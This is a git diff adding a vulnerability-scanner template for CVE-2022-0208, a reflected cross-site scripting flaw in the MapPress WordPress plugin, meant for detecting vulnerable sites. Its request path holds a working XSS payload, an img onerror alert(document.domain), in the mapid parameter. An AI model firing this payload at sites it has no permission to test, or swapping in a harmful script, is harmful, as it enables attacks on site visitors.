diff --git a/cves/2022/CVE-2022-0208.yaml b/cves/2022/CVE-2022-0208.yaml new file mode 100644 index 0000000000..4ede2bc761 --- /dev/null +++ b/cves/2022/CVE-2022-0208.yaml @@ -0,0 +1,39 @@ +id: CVE-2022-0208 + +info: + name: WordPress Plugin MapPress < 2.73.4 - Reflected XSS + author: edoardottt + severity: medium + description: The MapPress Maps for WordPress plugin before 2.73.4 does not sanitise and escape the mapid parameter before outputting it back in the "Bad mapid" error message, leading to a Reflected Cross-Site Scripting. + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N + cvss-score: 6.1 + cve-id: CVE-2022-0208 + cwe-id: CWE-79 + reference: + - https://nvd.nist.gov/vuln/detail/CVE-2022-0208 + - https://wpscan.com/vulnerability/59a2abd0-4aee-47aa-ad3a-865f624fa0fc + tags: cve,cve2022,mappress,xss,wordpress,wp-plugin + +requests: + - method: GET + path: + - "{{BaseURL}}/?mapp_iframe=1&mapid=--%3E%3Cimg%20src%20onerror=alert(document.domain)%3E" + + matchers-condition: and + matchers: + - type: status + status: + - 200 + + - type: word + part: header + words: + - "text/html" + + - type: word + part: body + words: + - "" + - "Bad mapid" + condition: and \ No newline at end of file